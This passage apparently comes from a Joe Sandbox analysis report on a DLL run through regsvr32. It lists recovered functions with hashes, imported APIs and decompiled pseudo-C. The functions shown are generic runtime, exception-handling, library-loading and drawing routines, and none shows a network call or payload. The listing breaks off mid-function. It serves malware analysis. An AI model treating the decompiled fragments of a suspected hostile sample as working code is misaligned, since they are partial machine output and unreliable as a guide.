Instruction ID: 5832ada96ac7a9a3735caa9308b4f393fcbcdb22340ab9120eed9862a5ccc0b6
Opcode Fuzzy Hash: 1190db60a81a9605ea1e1068c6cf6b0ac0731fea71818b2d4916113a12896c76
Instruction Fuzzy Hash: D8519DB490438E8FDB48CF68C88A5DF7BB1FB58348F004A19E825A6250D3B8D665CF91

Uniqueness

Uniqueness Score: -1.00%

Function 005DCC84 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4555d26f65456cde840fc2f4c666a8d56836cf0868c008055827d07d980c0c85
Instruction ID: 22269a29ab93f5680a7f95fe88ddf2fe4e90b2ced64062bbfcf848b1ceb6c362
Opcode Fuzzy Hash: 4555d26f65456cde840fc2f4c666a8d56836cf0868c008055827d07d980c0c85
Instruction Fuzzy Hash: 1B41C2B090074E8FDB48DF64C48A5DE7FB0FB68388F104619E81AA6250D378D6A4CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 005CFFB8 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2ca811980bf69d3a725c6de3b3fc4f76b8583c10f578fbad8bf36fe51f88080
Instruction ID: ffc56fd7168c6e695a14d31422796184757635042a1164aedc04677320af0710
Opcode Fuzzy Hash: c2ca811980bf69d3a725c6de3b3fc4f76b8583c10f578fbad8bf36fe51f88080
Instruction Fuzzy Hash: 9B3175B052D781ABD38CDF28D59991ABBE1FB89304F806A2DF98687350D774D445CB07

Uniqueness

Uniqueness Score: -1.00%

Function 005D8E08 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 830eef0a3232ecb80f2826221d342755302fd87f2307e2f844fd0bd61878f91c
Instruction ID: efbb35fdfc96545695bc25e3bd00db16034c98cb8ef7f57b9f660a286bfd5c46
Opcode Fuzzy Hash: 830eef0a3232ecb80f2826221d342755302fd87f2307e2f844fd0bd61878f91c
Instruction Fuzzy Hash: 5F315AB450C7848BD348DF28C54A51ABBE1BB8D309F404B5DF8CAAA360D778D615CB4B

Uniqueness

Uniqueness Score: -1.00%

Function 005D4F18 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f0004951027548f87f8e7a2444adc3bba6861f54e8d6066d46ca53370045021
Instruction ID: 623f27fec58fef4aaa379f7fbafc113b066f1698bb351901cc59bf5a19c6bb77
Opcode Fuzzy Hash: 2f0004951027548f87f8e7a2444adc3bba6861f54e8d6066d46ca53370045021
Instruction Fuzzy Hash: 1B218E70629380AFD388DF28D48981ABBF0BB89344F806A2DF8C68B360D775D445CB03

Uniqueness

Uniqueness Score: -1.00%

Function 005D15C8 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eb31fd98d478cbf7892b0886e03ca27d91577c01988fac24f665ec931eb86f0
Instruction ID: 199196ca8ace7e8d42d391659d5c3f2c80ec6c3440db0b61eb753a63f83db2a3
Opcode Fuzzy Hash: 3eb31fd98d478cbf7892b0886e03ca27d91577c01988fac24f665ec931eb86f0
Instruction Fuzzy Hash: 622146B45187858BD349DF28D49941ABBE0FB8C31CF805B2DF4CAAA264D378D645CB0A

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800070A0 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E000000011800070A0(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t25;

				_t25 = __r8;
				r8d = 0;
				 *0x800223a8 = r8d;
				_t1 = _t25 + 1; // 0x1
				r9d = _t1;
				asm("cpuid");
				_v16 = r9d;
				_v16 = 0;
				_v20 = __ebx;
				_v12 = __edx;
				if (0 != 0x18001000) goto 0x80007101;
				asm("xgetbv");
				_a8 = __rdx << 0x00000020 | __rax;
				r8d =  *0x800223a8; // 0x1
				r8d =  ==  ? r9d : r8d;
				 *0x800223a8 = r8d;
				 *0x800223ac = r8d;
				return 0;
			}

0x1800070a0
0x1800070a6
0x1800070ab
0x1800070b2
0x1800070b2
0x1800070b9
0x1800070bb
0x1800070c3
0x1800070c9
0x1800070cd
0x1800070d3
0x1800070d7
0x1800070e1
0x1800070eb
0x1800070f6
0x1800070fa
0x180007101
0x18000710f

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
Instruction ID: 0b5ba2cec2f3816840067680c3456701fe7a71aa0eb5ae5909cae72e813b022f
Opcode Fuzzy Hash: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
Instruction Fuzzy Hash: B2F062717142989EDBEACF6CA84275A77D0E30C3C0F90C029E6D983B04D63C82A48F44

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010190 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 249COMMON

Download Yara Rule

APIs

GetGestureInfo.USER32 ref: 00000001800101C0
CloseGestureInfoHandle.USER32 ref: 0000000180010672

Strings

8, xrefs: 00000001800101AB

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: GestureInfo$CloseHandle
String ID: 8
API String ID: 372500805-4194326291
Opcode ID: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
Instruction ID: 9b1c06a3f3b833ac3e132f42adadd70dae9d03e82ad46587f4b990887cf4d8b3
Opcode Fuzzy Hash: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
Instruction Fuzzy Hash: B8D1DD76608F888AD765CB29E45439EB7A0F7C9BD0F508116EACE83768DF78C545CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800106E0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100windowCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32 ref: 0000000180010872
BeginPaint.USER32 ref: 0000000180010889
EndPaint.USER32 ref: 00000001800108B2
PostQuitMessage.USER32 ref: 00000001800108BC
DefWindowProcW.USER32 ref: 00000001800108E3

Strings

i, xrefs: 000000018001083A

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: PaintProcWindow$BeginMessagePostQuit
String ID: i
API String ID: 3181456275-3865851505
Opcode ID: fcb843795d6400421a4bb60a8f9f2442e166c0b7f90a62d720e089610d409317
Instruction ID: 3856721ac4770c8f636c1cd384f04675dc9eeb63fc6bf43fe2054305ebc0c00e
Opcode Fuzzy Hash: fcb843795d6400421a4bb60a8f9f2442e166c0b7f90a62d720e089610d409317
Instruction Fuzzy Hash: FA51ED32518AC8C6E7B2DB55E4543DEB360F788784F609516F6CA52A98CFBCC548DF40

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000FCB0 Relevance: 13.7, APIs: 9, Instructions: 204COMMON

Download Yara Rule

APIs

CreatePen.GDI32 ref: 000000018000FCEE
SelectObject.GDI32 ref: 000000018000FD06
Polyline.GDI32 ref: 000000018000FFA3
MoveToEx.GDI32 ref: 000000018000FFE3
LineTo.GDI32 ref: 000000018001000C
MoveToEx.GDI32 ref: 0000000180010038
LineTo.GDI32 ref: 0000000180010061
SelectObject.GDI32 ref: 0000000180010074
DeleteObject.GDI32 ref: 000000018001007F

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: Object$LineMoveSelect$CreateDeletePolyline
String ID:
API String ID: 1917832262-0
Opcode ID: 6075ceb34f4407423de1dccbff4bd8bdfe60344340a25c122dca44a040083570
Instruction ID: 377a05cc6cc4517dbb54ffd3f6057de865f15df1cc6264ad20f86e3ae03f80f6
Opcode Fuzzy Hash: 6075ceb34f4407423de1dccbff4bd8bdfe60344340a25c122dca44a040083570
Instruction Fuzzy Hash: CDB12276604B848AD766CB38E05135AF7A5F7C9784F108216EACE53B69DF3CD5498F00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003328 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 66%

			E00000001180003328(intOrPtr __ecx, void* __edx, void* __esi, intOrPtr* __rcx, long long __rdx, long long __r8, long long __r9, void* __r10) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int* _t128;
				void* _t145;
				intOrPtr _t146;
				intOrPtr _t154;
				void* _t173;
				intOrPtr _t176;
				signed int _t177;
				signed int _t178;
				void* _t209;
				signed long long _t219;
				signed long long _t220;
				signed long long _t226;
				long long _t228;
				signed int _t235;
				intOrPtr* _t236;
				intOrPtr* _t237;
				signed long long _t246;
				long long _t267;
				signed int* _t280;
				long long _t281;
				void* _t282;
				void* _t283;
				signed long long _t284;
				long long _t296;
				signed int _t307;
				unsigned long long _t313;

				_t180 = __esi;
				_t282 = _t283 - 0x28;
				_t284 = _t283 - 0x128;
				_t219 =  *0x80021010; // 0xfdf94ef470f2
				_t220 = _t219 ^ _t284;
				 *(_t282 + 0x10) = _t220;
				_t280 =  *((intOrPtr*)(_t282 + 0x90));
				_t307 =  *((intOrPtr*)(_t282 + 0xa8));
				 *((long long*)(_t284 + 0x68)) = __r8;
				_t236 = __rcx;
				 *((long long*)(_t284 + 0x78)) = __rdx;
				 *(_t282 - 0x68) = _t307;
				 *((char*)(_t284 + 0x60)) = 0;
				_t281 = __r9;
				_t128 = E0000000118000427C(__ecx, __esi, __rcx, __rdx, __r9, __r9, _t282, _t280, __r9);
				r14d = _t128;
				if (_t128 - 0xffffffff < 0) goto 0x800037f7;
				if (_t128 - _t280[1] >= 0) goto 0x800037f7;
				if ( *_t236 != 0xe06d7363) goto 0x80003474;
				if ( *((intOrPtr*)(_t236 + 0x18)) != 4) goto 0x80003474;
				if ( *((intOrPtr*)(_t236 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003474;
				if ( *((long long*)(_t236 + 0x30)) != 0) goto 0x80003474;
				E00000001180002D40(_t220);
				if ( *((long long*)(_t220 + 0x20)) == 0) goto 0x80003790;
				E00000001180002D40(_t220);
				_t237 =  *((intOrPtr*)(_t220 + 0x20));
				E00000001180002D40(_t220);
				 *((char*)(_t284 + 0x60)) = 1;
				 *((long long*)(_t284 + 0x68)) =  *((intOrPtr*)(_t220 + 0x28));
				E00000001180002448(_t220,  *((intOrPtr*)(_t237 + 0x38)));
				if ( *_t237 != 0xe06d7363) goto 0x8000342c;
				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x8000342c;
				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x8000342c;
				if ( *((long long*)(_t237 + 0x30)) == 0) goto 0x800037f7;
				E00000001180002D40(_t220);
				if ( *(_t220 + 0x38) == 0) goto 0x80003474;
				E00000001180002D40(_t220);
				E00000001180002D40(_t220);
				 *(_t220 + 0x38) =  *(_t220 + 0x38) & 0x00000000;
				if (E00000001180004314(_t220, _t237, _t237,  *(_t220 + 0x38), __r9) != 0) goto 0x8000346f;
				if (E00000001180004404(_t220, _t237,  *(_t220 + 0x38), __r9, _t282) == 0) goto 0x800037d4;
				goto 0x800037b0;
				 *((long long*)(_t282 - 0x40)) =  *((intOrPtr*)(__r9 + 8));
				 *(_t282 - 0x48) = _t280;
				if ( *_t237 != 0xe06d7363) goto 0x80003747;
				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x80003747;
				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003747;
				r15d = 0;
				if (_t280[3] - r15d <= 0) goto 0x80003678;
				 *(_t284 + 0x28) =  *(_t282 + 0xa0);
				 *(_t284 + 0x20) = _t280;
				r8d = r14d;
				_t145 = E00000001180002134(_t237, _t282 - 0x28, _t282 - 0x48, __r9, _t282, _t280, __r9, __r10);
				asm("movups xmm0, [ebp-0x28]");
				asm("movdqu [ebp-0x38], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("movd eax, xmm0");
				if (_t145 -  *((intOrPtr*)(_t282 - 0x10)) >= 0) goto 0x80003678;
				_t296 =  *((intOrPtr*)(_t282 - 0x28));
				r13d =  *((intOrPtr*)(_t282 - 0x30));
				 *((long long*)(_t282 - 0x80)) = _t296;
				_t146 = r13d;
				asm("inc ecx");
				 *((intOrPtr*)(_t282 - 0x50)) = __ecx;
				asm("movd eax, xmm0");
				asm("movups [ebp-0x60], xmm0");
				if (_t146 - r14d > 0) goto 0x8000366b;
				_t226 =  *(_t282 - 0x60) >> 0x20;
				if (r14d - _t146 > 0) goto 0x8000366b;
				r12d = r15d;
				_t267 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t282 - 0x38)) + 0x10)) + ( *( *(_t282 - 0x38)) +  *( *(_t282 - 0x38)) * 4) * 4 +  *((intOrPtr*)(_t296 + 8)) + 0x10)) +  *((intOrPtr*)(__r9 + 8));
				_t313 =  *(_t282 - 0x58) >> 0x20;
				 *((long long*)(_t282 - 0x70)) = _t267;
				if (r15d == 0) goto 0x80003658;
				_t246 = _t226 + _t226 * 4;
				asm("movups xmm0, [edx+ecx*4]");
				asm("movups [ebp-0x8], xmm0");
				_t59 = _t246 * 4; // 0x48ccccc35f40c483
				 *((intOrPtr*)(_t282 + 8)) =  *((intOrPtr*)(_t267 + _t59 + 0x10));
				E0000000118000241C(_t226);
				_t228 = _t226 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc));
				 *((long long*)(_t284 + 0x70)) = _t228;
				E0000000118000241C(_t228);
				_t176 =  *((intOrPtr*)(_t228 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc))));
				 *((intOrPtr*)(_t284 + 0x64)) = _t176;
				if (_t176 <= 0) goto 0x800035e8;
				E0000000118000241C(_t228);
				 *((long long*)(_t282 - 0x78)) = _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70))));
				if (E00000001180003A1C(_t180, _t237, _t282 - 8, _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70)))), _t280, __r9,  *((intOrPtr*)(_t237 + 0x30))) != 0) goto 0x800035f9;
				 *((long long*)(_t284 + 0x70)) =  *((long long*)(_t284 + 0x70)) + 4;
				_t154 =  *((intOrPtr*)(_t284 + 0x64)) - 1;
				 *((intOrPtr*)(_t284 + 0x64)) = _t154;
				if (_t154 > 0) goto 0x800035ac;
				r12d = r12d + 1;
				if (r12d == r15d) goto 0x8000365f;
				goto 0x80003565;
				 *((char*)(_t284 + 0x58)) =  *((intOrPtr*)(_t282 + 0x98));
				 *(_t284 + 0x50) =  *((intOrPtr*)(_t284 + 0x60));
				 *((long long*)(_t284 + 0x48)) =  *(_t282 - 0x68);
				 *(_t284 + 0x40) =  *(_t282 + 0xa0);
				 *(_t284 + 0x38) = _t282 - 0x60;
				 *(_t284 + 0x30) =  *((intOrPtr*)(_t282 - 0x78));
				 *(_t284 + 0x28) = _t282 - 8;
				 *(_t284 + 0x20) = _t280;
				E00000001180003254(_t180, _t237, _t237,  *((intOrPtr*)(_t284 + 0x78)),  *((intOrPtr*)(_t284 + 0x68)), _t281);
				goto 0x80003664;
				goto 0x80003668;
				r15d = 0;
				r13d = r13d + 1;
				if (r13d -  *((intOrPtr*)(_t282 - 0x10)) < 0) goto 0x800034fd;
				if (( *_t280 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003784;
				_t209 = _t280[8] - r15d;
				if (_t209 == 0) goto 0x8000369e;
				E00000001180002408(_t282 - 8);
				if (_t209 != 0) goto 0x800036bf;
				if ((_t280[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003784;
				if (E00000001180001FD8(_t280[9] >> 0x00000002 & 0x00000001, _t282 - 8 + _t280[8], _t281, _t280) != 0) goto 0x80003784;
				if ((_t280[9] >> 0x00000002 & 0x00000001) != 0) goto 0x800037da;
				if (_t280[8] == r15d) goto 0x800036e4;
				E00000001180002408(_t282 - 8 + _t280[8]);
				_t235 = _t280[8];
				goto 0x800036e7;
				if (E00000001180004314(_t235, _t237, _t237, _t313, _t281) != 0) goto 0x80003784;
				E00000001180002068(_t237,  *((intOrPtr*)(_t284 + 0x78)), _t281, _t282, _t280, _t282 - 0x78);
				_t177 =  *((intOrPtr*)(_t282 + 0x98));
				 *(_t284 + 0x50) = _t177;
				_t178 = _t177 | 0xffffffff;
				 *((long long*)(_t284 + 0x48)) = _t281;
				 *(_t284 + 0x40) = _t313;
				 *(_t284 + 0x38) = _t178;
				 *(_t284 + 0x30) = _t178;
				 *(_t284 + 0x28) = _t280;
				 *(_t284 + 0x20) = _t313;
				E00000001180002274( *((intOrPtr*)(_t284 + 0x78)), _t237,  *((intOrPtr*)(_t284 + 0x68)), _t235);
				goto 0x80003784;
				if (_t280[3] <= 0) goto 0x80003784;
				if ( *((char*)(_t282 + 0x98)) != 0) goto 0x800037f7;
				 *(_t284 + 0x38) = _t307;
				 *(_t284 + 0x30) =  *(_t282 + 0xa0);
				 *(_t284 + 0x28) = r14d;
				 *(_t284 + 0x20) = _t280;
				E00000001180003800(_t237, _t237,  *((intOrPtr*)(_t284 + 0x78)), _t313, _t281);
				_t173 = E00000001180002D40(_t235);
				if ( *((long long*)(_t235 + 0x38)) != 0) goto 0x800037f7;
				return E000000011800010B0(_t173, _t178,  *(_t282 + 0x10) ^ _t284);
			}

0x180003328
0x180003335
0x18000333a
0x180003341
0x180003348
0x18000334b
0x18000334f
0x180003359
0x180003363
0x180003368
0x18000336b
0x180003376
0x18000337d
0x180003382
0x180003385
0x18000338a
0x180003390
0x180003399
0x1800033a5
0x1800033af
0x1800033c0
0x1800033cb
0x1800033d1
0x1800033db
0x1800033e1
0x1800033e6
0x1800033ea
0x1800033f3
0x1800033fc
0x180003401
0x18000340c
0x180003412
0x18000341f
0x180003426
0x18000342c
0x180003436
0x180003438
0x180003441
0x18000344c
0x180003458
0x180003464
0x18000346a
0x180003478
0x18000347c
0x180003486
0x180003490
0x1800034a1
0x1800034a7
0x1800034ae
0x1800034be
0x1800034c9
0x1800034ce
0x1800034d1
0x1800034d6
0x1800034da
0x1800034df
0x1800034e4
0x1800034eb
0x1800034f1
0x1800034f5
0x1800034f9
0x180003508
0x180003517
0x180003521
0x180003524
0x180003528
0x18000352f
0x180003539
0x180003540
0x180003546
0x18000354c
0x180003554
0x180003558
0x18000355f
0x180003568
0x18000356c
0x180003570
0x180003574
0x180003578
0x18000357b
0x18000358c
0x18000358f
0x180003594
0x1800035a1
0x1800035a4
0x1800035aa
0x1800035ac
0x1800035c7
0x1800035d2
0x1800035d8
0x1800035de
0x1800035e0
0x1800035e6
0x1800035e8
0x1800035ee
0x1800035f4
0x180003612
0x18000361a
0x180003622
0x18000362d
0x180003635
0x18000363e
0x180003647
0x18000364c
0x180003651
0x180003656
0x18000365d
0x180003668
0x18000366b
0x180003672
0x180003684
0x18000368a
0x18000368e
0x180003690
0x18000369c
0x1800036a6
0x1800036b9
0x1800036c7
0x1800036d1
0x1800036d3
0x1800036db
0x1800036e2
0x1800036f1
0x180003704
0x180003709
0x18000371a
0x18000371e
0x180003721
0x180003726
0x18000372b
0x18000372f
0x180003736
0x18000373b
0x180003740
0x180003745
0x18000374b
0x180003754
0x180003763
0x18000376b
0x180003772
0x18000377a
0x18000377f
0x180003784
0x18000378e
0x1800037af

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000000180003385

Part of subcall function 000000018000427C: __GetUnwindTryBlock.LIBCMT ref: 00000001800042BF
Part of subcall function 000000018000427C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00000001800042E4

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000000018000345D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00000001800036B2
std::bad_alloc::bad_alloc.LIBCMT ref: 00000001800037BE

Strings

csm, xrefs: 0000000180003406
csm, xrefs: 000000018000339F
csm, xrefs: 0000000180003480

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
Instruction ID: 68369fba8b053f101f7a0a57f2a328d7db6ec17b1fffbc4fe0a5b608d0144455
Opcode Fuzzy Hash: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
Instruction Fuzzy Hash: C0E1B272604B888AEBA6DF66D4423DD77A4F749BC8F008116FE8957B96CF34D698C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000A3DC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0000000118000A3DC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				void* _t35;
				signed long long _t56;
				intOrPtr _t60;
				void* _t71;
				signed long long _t72;
				long long _t78;
				void* _t82;
				signed long long _t88;
				signed long long _t89;
				signed long long _t90;
				WCHAR* _t91;
				long _t94;
				void* _t97;
				WCHAR* _t102;

				 *((long long*)(_t82 + 8)) = __rbx;
				 *((long long*)(_t82 + 0x10)) = _t78;
				 *((long long*)(_t82 + 0x18)) = __rsi;
				r15d = __ecx;
				_t72 = _t71 | 0xffffffff;
				_t89 =  *0x80021010; // 0xfdf94ef470f2
				_t88 =  *(0x180000000 + 0x226f0 + _t102 * 8) ^ _t89;
				asm("dec ecx");
				if (_t88 == _t72) goto 0x8000a51f;
				if (_t88 == 0) goto 0x8000a441;
				_t56 = _t88;
				goto 0x8000a521;
				if (__r8 == __r9) goto 0x8000a504;
				_t60 =  *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8));
				if (_t60 == 0) goto 0x8000a469;
				if (_t60 != _t72) goto 0x8000a55e;
				goto 0x8000a4f0;
				r8d = 0x800;
				LoadLibraryExW(_t102, _t97, _t94);
				if (_t56 != 0) goto 0x8000a53e;
				if (GetLastError() != 0x57) goto 0x8000a4de;
				_t14 = _t56 - 0x50; // -80
				_t35 = _t14;
				r8d = _t35;
				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
				r8d = _t35;
				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
				r8d = 0;
				LoadLibraryExW(_t91, _t71);
				if (_t56 != 0) goto 0x8000a53e;
				 *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8)) = _t72;
				if (__r8 + 4 != __r9) goto 0x8000a44a;
				_t90 =  *0x80021010; // 0xfdf94ef470f2
				asm("dec eax");
				 *(0x180000000 + 0x226f0 + _t102 * 8) = _t72 ^ _t90;
				return 0;
			}

0x18000a3dc
0x18000a3e1
0x18000a3e6
0x18000a3f8
0x18000a402
0x18000a418
0x18000a41f
0x18000a428
0x18000a42e
0x18000a437
0x18000a439
0x18000a43c
0x18000a444
0x18000a44d
0x18000a459
0x18000a45e
0x18000a464
0x18000a476
0x18000a47c
0x18000a488
0x18000a497
0x18000a499
0x18000a499
0x18000a49f
0x18000a4b0
0x18000a4b2
0x18000a4c6
0x18000a4c8
0x18000a4d0
0x18000a4dc
0x18000a4e8
0x18000a4f7
0x18000a4fd
0x18000a511
0x18000a517
0x18000a53d

APIs

FreeLibrary.KERNEL32 ref: 000000018000A558
GetProcAddress.KERNEL32 ref: 000000018000A564

Strings

ext-ms-, xrefs: 000000018000A4B5
api-ms-, xrefs: 000000018000A4A2

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
Instruction ID: 4cb29e05f73c92bcfdeebd25cdbb701ff5eb44b215489781f60aaecc25d2491e
Opcode Fuzzy Hash: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
Instruction Fuzzy Hash: ED41D032715A0856FBA7CB16AC047D53391B78EBE0F09C225BD1D47798EE38C64D8300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800045BC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E000000011800045BC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				struct HINSTANCE__* _t81;
				long long _t85;
				void* _t89;
				struct HINSTANCE__* _t94;
				long _t97;
				void* _t100;
				signed long long _t101;
				WCHAR* _t104;

